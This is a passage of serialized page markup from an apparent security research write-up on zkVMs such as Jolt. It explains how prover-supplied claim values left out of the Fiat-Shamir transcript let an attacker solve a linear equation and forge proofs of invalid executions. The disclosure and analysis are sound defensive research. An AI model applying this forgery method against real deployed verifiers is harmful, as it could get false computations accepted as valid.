"type":24,"tag":301,"props":121303,"children":121305},{"className":121304},[10855,28411],[121306,121336],{"type":24,"tag":301,"props":121307,"children":121309},{"className":121308},[10860],[121310,121331],{"type":24,"tag":301,"props":121311,"children":121313},{"className":121312,"style":119072},[10865],[121314],{"type":24,"tag":301,"props":121315,"children":121317},{"style":121316},"top:-2.3488em;margin-right:0.0714em;",[121318,121322],{"type":24,"tag":301,"props":121319,"children":121321},{"className":121320,"style":115601},[10874],[],{"type":24,"tag":301,"props":121323,"children":121325},{"className":121324},[10880,115606,115607,10883],[121326],{"type":24,"tag":301,"props":121327,"children":121329},{"className":121328,"style":101173},[10835,28357,10883],[121330],{"type":30,"value":95387},{"type":24,"tag":301,"props":121332,"children":121334},{"className":121333},[28514],[121335],{"type":30,"value":28517},{"type":24,"tag":301,"props":121337,"children":121339},{"className":121338},[10860],[121340],{"type":24,"tag":301,"props":121341,"children":121344},{"className":121342,"style":121343},[10865],"height:0.1512em;",[121345],{"type":24,"tag":301,"props":121346,"children":121347},{},[],{"type":24,"tag":301,"props":121349,"children":121350},{"style":120312},[121351,121355],{"type":24,"tag":301,"props":121352,"children":121354},{"className":121353,"style":118911},[10874],[],{"type":24,"tag":301,"props":121356,"children":121358},{"className":121357,"style":120322},[120321],[],{"type":24,"tag":301,"props":121360,"children":121361},{"style":120326},[121362,121366],{"type":24,"tag":301,"props":121363,"children":121365},{"className":121364,"style":118911},[10874],[],{"type":24,"tag":301,"props":121367,"children":121369},{"className":121368},[10880,10881,10882,10883],[121370],{"type":24,"tag":301,"props":121371,"children":121373},{"className":121372},[10835,10883],[121374],{"type":24,"tag":301,"props":121375,"children":121377},{"className":121376},[10835,10883],[121378],{"type":30,"value":546},{"type":24,"tag":301,"props":121380,"children":121382},{"className":121381},[28514],[121383],{"type":30,"value":28517},{"type":24,"tag":301,"props":121385,"children":121387},{"className":121386},[10860],[121388],{"type":24,"tag":301,"props":121389,"children":121392},{"className":121390,"style":121391},[10865],"height:0.4509em;",[121393],{"type":24,"tag":301,"props":121394,"children":121395},{},[],{"type":24,"tag":301,"props":121397,"children":121399},{"className":121398},[28508,120257],[],{"type":24,"tag":32,"props":121401,"children":121402},{},[121403,121405,121587],{"type":30,"value":121404},"The global check: ",{"type":24,"tag":145,"props":121406,"children":121408},{"className":121407},[10807,10808],[121409],{"type":24,"tag":301,"props":121410,"children":121412},{"className":121411},[10813],[121413],{"type":24,"tag":301,"props":121414,"children":121416},{"className":121415,"ariaHidden":10819},[10818],[121417,121574],{"type":24,"tag":301,"props":121418,"children":121420},{"className":121419},[10824],[121421,121425,121482,121486,121495,121500,121561,121565,121570],{"type":24,"tag":301,"props":121422,"children":121424},{"className":121423,"style":99687},[10829],[],{"type":24,"tag":301,"props":121426,"children":121428},{"className":121427},[28393],[121429,121434],{"type":24,"tag":301,"props":121430,"children":121432},{"className":121431,"style":28400},[28393,28398,28399],[121433],{"type":30,"value":115536},{"type":24,"tag":301,"props":121435,"children":121437},{"className":121436},[10850],[121438],{"type":24,"tag":301,"props":121439,"children":121441},{"className":121440},[10855,28411],[121442,121471],{"type":24,"tag":301,"props":121443,"children":121445},{"className":121444},[10860],[121446,121466],{"type":24,"tag":301,"props":121447,"children":121449},{"className":121448,"style":120946},[10865],[121450],{"type":24,"tag":301,"props":121451,"children":121452},{"style":28424},[121453,121457],{"type":24,"tag":301,"props":121454,"children":121456},{"className":121455,"style":10875},[10874],[],{"type":24,"tag":301,"props":121458,"children":121460},{"className":121459},[10880,10881,10882,10883],[121461],{"type":24,"tag":301,"props":121462,"children":121464},{"className":121463},[10835,28357,10883],[121465],{"type":30,"value":10564},{"type":24,"tag":301,"props":121467,"children":121469},{"className":121468},[28514],[121470],{"type":30,"value":28517},{"type":24,"tag":301,"props":121472,"children":121474},{"className":121473},[10860],[121475],{"type":24,"tag":301,"props":121476,"children":121478},{"className":121477,"style":121226},[10865],[121479],{"type":24,"tag":301,"props":121480,"children":121481},{},[],{"type":24,"tag":301,"props":121483,"children":121485},{"className":121484,"style":10953},[10914],[],{"type":24,"tag":301,"props":121487,"children":121489},{"className":121488},[10835,30],[121490],{"type":24,"tag":301,"props":121491,"children":121493},{"className":121492},[10835],[121494],{"type":30,"value":120832},{"type":24,"tag":301,"props":121496,"children":121498},{"className":121497,"style":99745},[10835],[121499],{"type":30,"value":9918},{"type":24,"tag":301,"props":121501,"children":121503},{"className":121502},[10835],[121504,121513],{"type":24,"tag":301,"props":121505,"children":121507},{"className":121506},[10835,30],[121508],{"type":24,"tag":301,"props":121509,"children":121511},{"className":121510},[10835],[121512],{"type":30,"value":83344},{"type":24,"tag":301,"props":121514,"children":121516},{"className":121515},[10850],[121517],{"type":24,"tag":301,"props":121518,"children":121520},{"className":121519},[10855,28411],[121521,121550],{"type":24,"tag":301,"props":121522,"children":121524},{"className":121523},[10860],[121525,121545],{"type":24,"tag":301,"props":121526,"children":121528},{"className":121527,"style":100273},[10865],[121529],{"type":24,"tag":301,"props":121530,"children":121531},{"style":120869},[121532,121536],{"type":24,"tag":301,"props":121533,"children":121535},{"className":121534,"style":10875},[10874],[],{"type":24,"tag":301,"props":121537,"children":121539},{"className":121538},[10880,10881,10882,10883],[121540],{"type":24,"tag":301,"props":121541,"children":121543},{"className":121542},[10835,28357,10883],[121544],{"type":30,"value":10564},{"type":24,"tag":301,"props":121546,"children":121548},{"className":121547},[28514],[121549],{"type":30,"value":28517},{"type":24,"tag":301,"props":121551,"children":121553},{"className":121552},[10860],[121554],{"type":24,"tag":301,"props":121555,"children":121557},{"className":121556,"style":99828},[10865],[121558],{"type":24,"tag":301,"props":121559,"children":121560},{},[],{"type":24,"tag":301,"props":121562,"children":121564},{"className":121563,"style":11012},[10914],[],{"type":24,"tag":301,"props":121566,"children":121568},{"className":121567},[11017],[121569],{"type":30,"value":523},{"type":24,"tag":301,"props":121571,"children":121573},{"className":121572,"style":11012},[10914],[],{"type":24,"tag":301,"props":121575,"children":121577},{"className":121576},[10824],[121578,121582],{"type":24,"tag":301,"props":121579,"children":121581},{"className":121580,"style":100775},[10829],[],{"type":24,"tag":301,"props":121583,"children":121585},{"className":121584},[10835],[121586],{"type":30,"value":584},{"type":30,"value":206},{"type":24,"tag":32,"props":121589,"children":121590},{},[121591,121596,121598,121604],{"type":24,"tag":60,"props":121592,"children":121593},{},[121594],{"type":30,"value":121595},"Why this is vulnerable:",{"type":30,"value":121597}," The ",{"type":24,"tag":145,"props":121599,"children":121601},{"className":121600},[],[121602],{"type":30,"value":121603},"claimed_sum",{"type":30,"value":121605}," values are prover-supplied. If they're not in the transcript before challenges are derived, the prover can adjust them to make the sum zero for an invalid execution.",{"type":24,"tag":2719,"props":121607,"children":121608},{},[],{"type":24,"tag":43,"props":121610,"children":121612},{"id":121611},"the-universal-attack-pattern",[121613],{"type":30,"value":121614},"The Universal Attack Pattern",{"type":24,"tag":32,"props":121616,"children":121617},{},[121618],{"type":30,"value":121619},"Now we can describe the attack pattern that works on all six systems:",{"type":24,"tag":32,"props":121621,"children":121622},{},[121623],{"type":24,"tag":177,"props":121624,"children":121627},{"alt":121625,"src":121626},"2_attack_pattern","/posts/zkvms-unfaithful-claims/2_attack_pattern.svg",[],{"type":24,"tag":32,"props":121629,"children":121630},{},[121631,121633,121658],{"type":30,"value":121632},"When a value ",{"type":24,"tag":145,"props":121634,"children":121636},{"className":121635},[10807,10808],[121637],{"type":24,"tag":301,"props":121638,"children":121640},{"className":121639},[10813],[121641],{"type":24,"tag":301,"props":121642,"children":121644},{"className":121643,"ariaHidden":10819},[10818],[121645],{"type":24,"tag":301,"props":121646,"children":121648},{"className":121647},[10824],[121649,121653],{"type":24,"tag":301,"props":121650,"children":121652},{"className":121651,"style":28352},[10829],[],{"type":24,"tag":301,"props":121654,"children":121656},{"className":121655,"style":114939},[10835,28357],[121657],{"type":30,"value":115263},{"type":30,"value":121659}," isn't transcript-bound:",{"type":24,"tag":6246,"props":121661,"children":121662},{},[121663,121694,121771,121916],{"type":24,"tag":2659,"props":121664,"children":121665},{},[121666,121668,121693],{"type":30,"value":121667},"Challenges are fixed (independent of ",{"type":24,"tag":145,"props":121669,"children":121671},{"className":121670},[10807,10808],[121672],{"type":24,"tag":301,"props":121673,"children":121675},{"className":121674},[10813],[121676],{"type":24,"tag":301,"props":121677,"children":121679},{"className":121678,"ariaHidden":10819},[10818],[121680],{"type":24,"tag":301,"props":121681,"children":121683},{"className":121682},[10824],[121684,121688],{"type":24,"tag":301,"props":121685,"children":121687},{"className":121686,"style":28352},[10829],[],{"type":24,"tag":301,"props":121689,"children":121691},{"className":121690,"style":114939},[10835,28357],[121692],{"type":30,"value":115263},{"type":30,"value":9961},{"type":24,"tag":2659,"props":121695,"children":121696},{},[121697,121699],{"type":30,"value":121698},"The verification equation has form: ",{"type":24,"tag":145,"props":121700,"children":121702},{"className":121701},[10807,10808],[121703],{"type":24,"tag":301,"props":121704,"children":121706},{"className":121705},[10813],[121707],{"type":24,"tag":301,"props":121708,"children":121710},{"className":121709,"ariaHidden":10819},[10818],[121711,121752],{"type":24,"tag":301,"props":121712,"children":121714},{"className":121713},[10824],[121715,121719,121724,121729,121734,121739,121743,121748],{"type":24,"tag":301,"props":121716,"children":121718},{"className":121717,"style":10935},[10829],[],{"type":24,"tag":301,"props":121720,"children":121722},{"className":121721,"style":102098},[10835,28357],[121723],{"type":30,"value":39835},{"type":24,"tag":301,"props":121725,"children":121727},{"className":121726},[28486],[121728],{"type":30,"value":362},{"type":24,"tag":301,"props":121730,"children":121732},{"className":121731,"style":114939},[10835,28357],[121733],{"type":30,"value":115263},{"type":24,"tag":301,"props":121735,"children":121737},{"className":121736},[28508],[121738],{"type":30,"value":9961},{"type":24,"tag":301,"props":121740,"children":121742},{"className":121741,"style":11012},[10914],[],{"type":24,"tag":301,"props":121744,"children":121746},{"className":121745},[11017],[121747],{"type":30,"value":523},{"type":24,"tag":301,"props":121749,"children":121751},{"className":121750,"style":11012},[10914],[],{"type":24,"tag":301,"props":121753,"children":121755},{"className":121754},[10824],[121756,121761],{"type":24,"tag":301,"props":121757,"children":121760},{"className":121758,"style":121759},[10829],"height:0.8095em;vertical-align:-0.1944em;",[],{"type":24,"tag":301,"props":121762,"children":121764},{"className":121763},[10835,30],[121765],{"type":24,"tag":301,"props":121766,"children":121768},{"className":121767},[10835],[121769],{"type":30,"value":121770},"target",{"type":24,"tag":2659,"props":121772,"children":121773},{},[121774,121775,121801,121803],{"type":30,"value":8842},{"type":24,"tag":145,"props":121776,"children":121778},{"className":121777},[10807,10808],[121779],{"type":24,"tag":301,"props":121780,"children":121782},{"className":121781},[10813],[121783],{"type":24,"tag":301,"props":121784,"children":121786},{"className":121785,"ariaHidden":10819},[10818],[121787],{"type":24,"tag":301,"props":121788,"children":121790},{"className":121789},[10824],[121791,121796],{"type":24,"tag":301,"props":121792,"children":121795},{"className":121793,"style":121794},[10829],"height:0.8889em;vertical-align:-0.1944em;",[],{"type":24,"tag":301,"props":121797,"children":121799},{"className":121798,"style":102098},[10835,28357],[121800],{"type":30,"value":39835},{"type":30,"value":121802}," is linear: ",{"type":24,"tag":145,"props":121804,"children":121806},{"className":121805},[10807,10808],[121807],{"type":24,"tag":301,"props":121808,"children":121810},{"className":121809},[10813],[121811],{"type":24,"tag":301,"props":121812,"children":121814},{"className":121813,"ariaHidden":10819},[10818],[121815,121844,121871,121899],{"type":24,"tag":301,"props":121816,"children":121818},{"className":121817},[10824],[121819,121824,121831,121835,121840],{"type":24,"tag":301,"props":121820,"children":121823},{"className":121821,"style":121822},[10829],"height:0.4445em;",[],{"type":24,"tag":301,"props":121825,"children":121828},{"className":121826,"style":121827},[10835,28357],"margin-right:0.0037em;",[121829],{"type":30,"value":121830},"α",{"type":24,"tag":301,"props":121832,"children":121834},{"className":121833,"style":10915},[10914],[],{"type":24,"tag":301,"props":121836,"children":121838},{"className":121837},[10920],[121839],{"type":30,"value":118002},{"type":24,"tag":301,"props":121841,"children":121843},{"className":121842,"style":10915},[10914],[],{"type":24,"tag":301,"props":121845,"children":121847},{"className":121846},[10824],[121848,121853,121858,121862,121867],{"type":24,"tag":301,"props":121849,"children":121852},{"className":121850,"style":121851},[10829],"height:0.7667em;vertical-align:-0.0833em;",[],{"type":24,"tag":301,"props":121854,"children":121856},{"className":121855,"style":114939},[10835,28357],[121857],{"type":30,"value":115263},{"type":24,"tag":301,"props":121859,"children":121861},{"className":121860,"style":10915},[10914],[],{"type":24,"tag":301,"props":121863,"children":121865},{"className":121864},[10920],[121866],{"type":30,"value":11206},{"type":24,"tag":301,"props":121868,"children":121870},{"className":121869,"style":10915},[10914],[],{"type":24,"tag":301,"props":121872,"children":121874},{"className":121873},[10824],[121875,121879,121886,121890,121895],{"type":24,"tag":301,"props":121876,"children":121878},{"className":121877,"style":121794},[10829],[],{"type":24,"tag":301,"props":121880,"children":121883},{"className":121881,"style":121882},[10835,28357],"margin-right:0.05278em;",[121884],{"type":30,"value":121885},"β",{"type":24,"tag":301,"props":121887,"children":121889},{"className":121888,"style":11012},[10914],[],{"type":24,"tag":301,"props":121891,"children":121893},{"className":121892},[11017],[121894],{"type":30,"value":523},{"type":24,"tag":301,"props":121896,"children":121898},{"className":121897,"style":11012},[10914],[],{"type":24,"tag":301,"props":121900,"children":121902},{"className":121901},[10824],[121903,121907],{"type":24,"tag":301,"props":121904,"children":121906},{"className":121905,"style":121759},[10829],[],{"type":24,"tag":301,"props":121908,"children":121910},{"className":121909},[10835,30],[121911],{"type":24,"tag":301,"props":121912,"children":121914},{"className":121913},[10835],[121915],{"type":30,"value":121770},{"type":24,"tag":2659,"props":121917,"children":121918},{},[121919,121921],{"type":30,"value":121920},"Solve: ",{"type":24,"tag":145,"props":121922,"children":121924},{"className":121923},[10807,10808],[121925],{"type":24,"tag":301,"props":121926,"children":121928},{"className":121927},[10813],[121929],{"type":24,"tag":301,"props":121930,"children":121932},{"className":121931,"ariaHidden":10819},[10818],[121933,121959,121994],{"type":24,"tag":301,"props":121934,"children":121936},{"className":121935},[10824],[121937,121941,121946,121950,121955],{"type":24,"tag":301,"props":121938,"children":121940},{"className":121939,"style":28352},[10829],[],{"type":24,"tag":301,"props":121942,"children":121944},{"className":121943,"style":114939},[10835,28357],[121945],{"type":30,"value":115263},{"type":24,"tag":301,"props":121947,"children":121949},{"className":121948,"style":11012},[10914],[],{"type":24,"tag":301,"props":121951,"children":121953},{"className":121952},[11017],[121954],{"type":30,"value":523},{"type":24,"tag":301,"props":121956,"children":121958},{"className":121957,"style":11012},[10914],[],{"type":24,"tag":301,"props":121960,"children":121962},{"className":121961},[10824],[121963,121967,121972,121981,121985,121990],{"type":24,"tag":301,"props":121964,"children":121966},{"className":121965,"style":10935},[10829],[],{"type":24,"tag":301,"props":121968,"children":121970},{"className":121969},[28486],[121971],{"type":30,"value":362},{"type":24,"tag":301,"props":121973,"children":121975},{"className":121974},[10835,30],[121976],{"type":24,"tag":301,"props":121977,"children":121979},{"className":121978},[10835],[121980],{"type":30,"value":121770},{"type":24,"tag":301,"props":121982,"children":121984},{"className":121983,"style":10915},[10914],[],{"type":24,"tag":301,"props":121986,"children":121988},{"className":121987},[10920],[121989],{"type":30,"value":10894},{"type":24,"tag":301,"props":121991,"children":121993},{"className":121992,"style":10915},[10914],[],{"type":24,"tag":301,"props":121995,"children":121997},{"className":121996},[10824],[121998,122002,122007,122012,122017],{"type":24,"tag":301,"props":121999,"children":122001},{"className":122000,"style":10935},[10829],[],{"type":24,"tag":301,"props":122003,"children":122005},{"className":122004,"style":121882},[10835,28357],[122006],{"type":30,"value":121885},{"type":24,"tag":301,"props":122008,"children":122010},{"className":122009},[28508],[122011],{"type":30,"value":9961},{"type":24,"tag":301,"props":122013,"children":122015},{"className":122014},[10835],[122016],{"type":30,"value":1036},{"type":24,"tag":301,"props":122018,"children":122020},{"className":122019,"style":121827},[10835,28357],[122021],{"type":30,"value":121830},{"type":24,"tag":32,"props":122023,"children":122024},{},[122025],{"type":30,"value":122026},"In the simplest linear case, forging reduces to solving a low-dimensional field equation, while other systems require small coupled systems.",{"type":24,"tag":32,"props":122028,"children":122029},{},[122030,122032,122110],{"type":30,"value":122031},"For systems with multiple unbound values, we get a system of linear equations. Gaussian elimination solves it in ",{"type":24,"tag":145,"props":122033,"children":122035},{"className":122034},[10807,10808],[122036],{"type":24,"tag":301,"props":122037,"children":122039},{"className":122038},[10813],[122040],{"type":24,"tag":301,"props":122041,"children":122043},{"className":122042,"ariaHidden":10819},[10818],[122044],{"type":24,"tag":301,"props":122045,"children":122047},{"className":122046},[10824],[122048,122053,122059,122064,122105],{"type":24,"tag":301,"props":122049,"children":122052},{"className":122050,"style":122051},[10829],"height:1.0641em;vertical-align:-0.25em;",[],{"type":24,"tag":301,"props":122054,"children":122056},{"className":122055,"style":99745},[10835,28357],[122057],{"type":30,"value":122058},"O",{"type":24,"tag":301,"props":122060,"children":122062},{"className":122061},[28486],[122063],{"type":30,"value":362},{"type":24,"tag":301,"props":122065,"children":122067},{"className":122066},[10835],[122068,122073],{"type":24,"tag":301,"props":122069,"children":122071},{"className":122070},[10835,28357],[122072],{"type":30,"value":63123},{"type":24,"tag":301,"props":122074,"children":122076},{"className":122075},[10850],[122077],{"type":24,"tag":301,"props":122078,"children":122080},{"className":122079},[10855],[122081],{"type":24,"tag":301,"props":122082,"children":122084},{"className":122083},[10860],[122085],{"type":24,"tag":301,"props":122086,"children":122088},{"className":122087,"style":10830},[10865],[122089],{"type":24,"tag":301,"props":122090,"children":122091},{"style":10869},[122092,122096],{"type":24,"tag":301,"props":122093,"children":122095},{"className":122094,"style":10875},[10874],[],{"type":24,"tag":301,"props":122097,"children":122099},{"className":122098},[10880,10881,10882,10883],[122100],{"type":24,"tag":301,"props":122101,"children":122103},{"className":122102},[10835,10883],[122104],{"type":30,"value":1447},{"type":24,"tag":301,"props":122106,"children":122108},{"className":122107},[28508],[122109],{"type":30,"value":9961},{"type":30,"value":122111}," field operations. For non-linear constraints, we might need to use some more advanced techniques like resultants and Groebner bases.",{"type":24,"tag":2719,"props":122113,"children":122114},{},[],{"type":24,"tag":43,"props":122116,"children":122118},{"id":122117},"the-six-broken-systems",[122119],{"type":30,"value":122120},"The Six Broken Systems",{"type":24,"tag":32,"props":122122,"children":122123},{},[122124],{"type":24,"tag":177,"props":122125,"children":122128},{"alt":122126,"src":122127},"3_six_broken_systems","/posts/zkvms-unfaithful-claims/3_six_broken_systems.svg",[],{"type":24,"tag":32,"props":122130,"children":122131},{},[122132],{"type":30,"value":122133},"Now let's see how this plays out in each system. We'll go deep on the first one (Jolt) to establish the pattern, then focus on what's unique about each subsequent system.",{"type":24,"tag":2719,"props":122135,"children":122136},{},[],{"type":24,"tag":80,"props":122138,"children":122140},{"id":122139},"jolt-a16z",[122141],{"type":30,"value":122142},"Jolt (a16z)",{"type":24,"tag":32,"props":122144,"children":122145},{},[122146],{"type":30,"value":122147},"Jolt is a zkVM for RISC-V programs, built by a16z. It uses sumcheck extensively to verify execution constraints.",{"type":24,"tag":32,"props":122149,"children":122150},{},[122151],{"type":24,"tag":60,"props":122152,"children":122153},{},[122154],{"type":30,"value":122155},"The proof structure:",{"type":24,"tag":291,"props":122157,"children":122159},{"code":122158},"JoltProof {\n commitments: Vec\u003CCommitment>, // Polynomial commitments to trace\n opening_claims: Map\u003COpeningId, Claim>, // \u003C- THE VULNERABLE VALUES\n proofs: Map\u003CStage, SumcheckProof>, // Sumcheck and opening proofs\n ...\n}\n",[122160],{"type":24,"tag":145,"props":122161,"children":122162},{"__ignoreMap":7},[122163],{"type":30,"value":122158},{"type":24,"tag":32,"props":122165,"children":122166},{},[122167],{"type":24,"tag":60,"props":122168,"children":122169},{},[122170],{"type":30,"value":122171},"The verification flow:",{"type":24,"tag":32,"props":122173,"children":122174},{},[122175],{"type":24,"tag":177,"props":122176,"children":122179},{"alt":122177,"src":122178},"4_jolt_verification_flow","/posts/zkvms-unfaithful-claims/4_jolt_verification_flow.svg",[],{"type":24,"tag":32,"props":122181,"children":122182},{},[122183,122188,122190,122196,122198,122204,122206,122211],{"type":24,"tag":60,"props":122184,"children":122185},{},[122186],{"type":30,"value":122187},"The bug:",{"type":30,"value":122189}," Each sumcheck instance provides an ",{"type":24,"tag":145,"props":122191,"children":122193},{"className":122192},[],[122194],{"type":30,"value":122195},"input_claim",{"type":30,"value":122197},", which is the value the polynomial allegedly sums to over the Boolean hypercube. These claims come from ",{"type":24,"tag":145,"props":122199,"children":122201},{"className":122200},[],[122202],{"type":30,"value":122203},"opening_claims",{"type":30,"value":122205}," in the proof, but they were ",{"type":24,"tag":60,"props":122207,"children":122208},{},[122209],{"type":30,"value":122210},"never absorbed into the transcript",{"type":30,"value":122212}," before the batching coefficients were derived.",{"type":24,"tag":32,"props":122214,"children":122215},{},[122216],{"type":24,"tag":177,"props":122217,"children":122220},{"alt":122218,"src":122219},"5_jolt_flow","/posts/zkvms-unfaithful-claims/5_jolt_flow.svg",[],{"type":24,"tag":32,"props":122222,"children":122223},{},[122224],{"type":24,"tag":60,"props":122225,"children":122226},{},[122227],{"type":30,"value":122228},"How sumcheck uses opening_claims:",{"type":24,"tag":32,"props":122230,"children":122231},{},[122232,122234,122240,122242,122319],{"type":30,"value":122233},"In Jolt's batched sumcheck, the verifier computes a target value ",{"type":24,"tag":145,"props":122235,"children":122237},{"className":122236},[],[122238],{"type":30,"value":122239},"BatchedClaim",{"type":30,"value":122241}," by taking a random linear combination of the individual claims ",{"type":24,"tag":145,"props":122243,"children":122245},{"className":122244},[10807,10808],[122246],{"type":24,"tag":301,"props":122247,"children":122249},{"className":122248},[10813],[122250],{"type":24,"tag":301,"props":122251,"children":122253},{"className":122252,"ariaHidden":10819},[10818],[122254],{"type":24,"tag":301,"props":122255,"children":122257},{"className":122256},[10824],[122258,122262],{"type":24,"tag":301,"props":122259,"children":122261},{"className":122260,"style":117737},[10829],[],{"type":24,"tag":301,"props":122263,"children":122265},{"className":122264},[10835],[122266,122271],{"type":24,"tag":301,"props":122267,"children":122269},{"className":122268,"style":99979},[10835,28357],[122270],{"type":30,"value":99982},{"type":24,"tag":301,"props":122272,"children":122274},{"className":122273},[10850],[122275],{"type":24,"tag":301,"props":122276,"children":122278},{"className":122277},[10855,28411],[122279,122308],{"type":24,"tag":301,"props":122280,"children":122282},{"className":122281},[10860],[122283,122303],{"type":24,"tag":301,"props":122284,"children":122286},{"className":122285,"style":100273},[10865],[122287],{"type":24,"tag":301,"props":122288,"children":122289},{"style":117169},[122290,122294],{"type":24,"tag":301,"props":122291,"children":122293},{"className":122292,"style":10875},[10874],[],{"type":24,"tag":301,"props":122295,"children":122297},{"className":122296},[10880,10881,10882,10883],[122298],{"type":24,"tag":301,"props":122299,"children":122301},{"className":122300},[10835,28357,10883],[122302],{"type":30,"value":10564},{"type":24,"tag":301,"props":122304,"children":122306},{"className":122305},[28514],[122307],{"type":30,"value":28517},{"type":24,"tag":301,"props":122309,"children":122311},{"className":122310},[10860],[122312],{"type":24,"tag":301,"props":122313,"children":122315},{"className":122314,"style":99828},[10865],[122316],{"type":24,"tag":301,"props":122317,"children":122318},{},[],{"type":30,"value":1679},{"type":24,"tag":32,"props":122321,"children":122322},{},[122323],{"type":24,"tag":145,"props":122324,"children":122326},{"className":122325},[10807,10808],[122327],{"type":24,"tag":301,"props":122328,"children":122330},{"className":122329},[10813],[122331],{"type":24,"tag":301,"props":122332,"children":122334},{"className":122333,"ariaHidden":10819},[10818],[122335,122365,122506],{"type":24,"tag":301,"props":122336,"children":122338},{"className":122337},[10824],[122339,122343,122352,122356,122361],{"type":24,"tag":301,"props":122340,"children":122342},{"className":122341,"style":99660},[10829],[],{"type":24,"tag":301,"props":122344,"children":122346},{"className":122345},[10835,30],[122347],{"type":24,"tag":301,"props":122348,"children":122350},{"className":122349},[10835],[122351],{"type":30,"value":122239},{"type":24,"tag":301,"props":122353,"children":122355},{"className":122354,"style":11012},[10914],[],{"type":24,"tag":301,"props":122357,"children":122359},{"className":122358},[11017],[122360],{"type":30,"value":523},{"type":24,"tag":301,"props":122362,"children":122364},{"className":122363,"style":11012},[10914],[],{"type":24,"tag":301,"props":122366,"children":122368},{"className":122367},[10824],[122369,122374,122431,122435,122493,122497,122502],{"type":24,"tag":301,"props":122370,"children":122373},{"className":122371,"style":122372},[10829],"height:1.0497em;vertical-align:-0.2997em;",[],{"type":24,"tag":301,"props":122375,"children":122377},{"className":122376},[28393],[122378,122383],{"type":24,"tag":301,"props":122379,"children":122381},{"className":122380,"style":28400},[28393,28398,28399],[122382],{"type":30,"value":115536},{"type":24,"tag":301,"props":122384,"children":122386},{"className":122385},[10850],[122387],{"type":24,"tag":301,"props":122388,"children":122390},{"className":122389},[10855,28411],[122391,122420],{"type":24,"tag":301,"props":122392,"children":122394},{"className":122393},[10860],[122395,122415],{"type":24,"tag":301,"props":122396,"children":122398},{"className":122397,"style":120946},[10865],[122399],{"type":24,"tag":301,"props":122400,"children":122401},{"style":28424},[122402,122406],{"type":24,"tag":301,"props":122403,"children":122405},{"className":122404,"style":10875},[10874],[],{"type":24,"tag":301,"props":122407,"children":122409},{"className":122408},[10880,10881,10882,10883],[122410],{"type":24,"tag":301,"props":122411,"children":122413},{"className":122412},[10835,28357,10883],[122414],{"type":30,"value":10564},{"type":24,"tag":301,"props":122416,"children":122418},{"className":122417},[28514],[122419],{"type":30,"value":28517},{"type":24,"tag":301,"props":122421,"children":122423},{"className":122422},[10860],[122424],{"type":24,"tag":301,"props":122425,"children":122427},{"className":122426,"style":121226},[10865],[122428],{"type":24,"tag":301,"props":122429,"children":122430},{},[],{"type":24,"tag":301,"props":122432,"children":122434},{"className":122433,"style":10953},[10914],[],{"type":24,"tag":301,"props":122436,"children":122438},{"className":122437},[10835],[122439,122444],{"type":24,"tag":301,"props":122440,"children":122442},{"className":122441,"style":121827},[10835,28357],[122443],{"type":30,"value":121830},{"type":24,"tag":301,"props":122445,"children":122447},{"className":122446},[10850],[122448],{"type":24,"tag":301,"props":122449,"children":122451},{"className":122450},[10855,28411],[122452,122482],{"type":24,"tag":301,"props":122453,"children":122455},{"className":122454},[10860],[122456,122477],{"type":24,"tag":301,"props":122457,"children":122459},{"className":122458,"style":100273},[10865],[122460],{"type":24,"tag":301,"props":122461,"children":122463},{"style":122462},"top:-2.55em;margin-left:-0.0037em;margin-right:0.05em;",[122464,122468],{"type":24,"tag":301,"props":122465,"children":122467},{"className":122466,"style":10875},[10874],[],{"type":24,"tag":301,"props":122469,"children":122471},{"className":122470},[10880,10881,10882,10883],[122472],{"type":24,"tag":301,"props":122473,"children":122475},{"className":122474},[10835,28357,10883],[122476],{"type":30,"value":10564},{"type":24,"tag":301,"props":122478,"children":122480},{"className":122479},[28514],[122481],{"type":30,"value":28517},{"type":24,"tag":301,"props":122483,"children":122485},{"className":122484},[10860],[122486],{"type":24,"tag":301,"props":122487,"children":122489},{"className":122488,"style":99828},[10865],[122490],{"type":24,"tag":301,"props":122491,"children":122492},{},[],{"type":24,"tag":301,"props":122494,"children":122496},{"className":122495,"style":10915},[10914],[],{"type":24,"tag":301,"props":122498,"children":122500},{"className":122499},[10920],[122501],{"type":30,"value":118002},{"type":24,"tag":301,"props":122503,"children":122505},{"className":122504,"style":10915},[10914],[],{"type":24,"tag":301,"props":122507,"children":122509},{"className":122508},[10824],[122510,122514],{"type":24,"tag":301,"props":122511,"children":122513},{"className":122512,"style":117737},[10829],[],{"type":24,"tag":301,"props":122515,"children":122517},{"className":122516},[10835],[122518,122523],{"type":24,"tag":301,"props":122519,"children":122521},{"className":122520,"style":99979},[10835,28357],[122522],{"type":30,"value":99982},{"type":24,"tag":301,"props":122524,"children":122526},{"className":122525},[10850],[122527],{"type":24,"tag":301,"props":122528,"children":122530},{"className":122529},[10855,28411],[122531,122560],{"type":24,"tag":301,"props":122532,"children":122534},{"className":122533},[10860],[122535,122555],{"type":24,"tag":301,"props":122536,"children":122538},{"className":122537,"style":100273},[10865],[122539],{"type":24,"tag":301,"props":122540,"children":122541},{"style":117169},[122542,122546],{"type":24,"tag":301,"props":122543,"children":122545},{"className":122544,"style":10875},[10874],[],{"type":24,"tag":301,"props":122547,"children":122549},{"className":122548},[10880,10881,10882,10883],[122550],{"type":24,"tag":301,"props":122551,"children":122553},{"className":122552},[10835,28357,10883],[122554],{"type":30,"value":10564},{"type":24,"tag":301,"props":122556,"children":122558},{"className":122557},[28514],[122559],{"type":30,"value":28517},{"type":24,"tag":301,"props":122561,"children":122563},{"className":122562},[10860],[122564],{"type":24,"tag":301,"props":122565,"children":122567},{"className":122566,"style":99828},[10865],[122568],{"type":24,"tag":301,"props":122569,"children":122570},{},[],{"type":24,"tag":32,"props":122572,"children":122573},{},[122574,122576,122653,122655,122660,122662,122739,122741,122818,122820,122897],{"type":30,"value":122575},"where 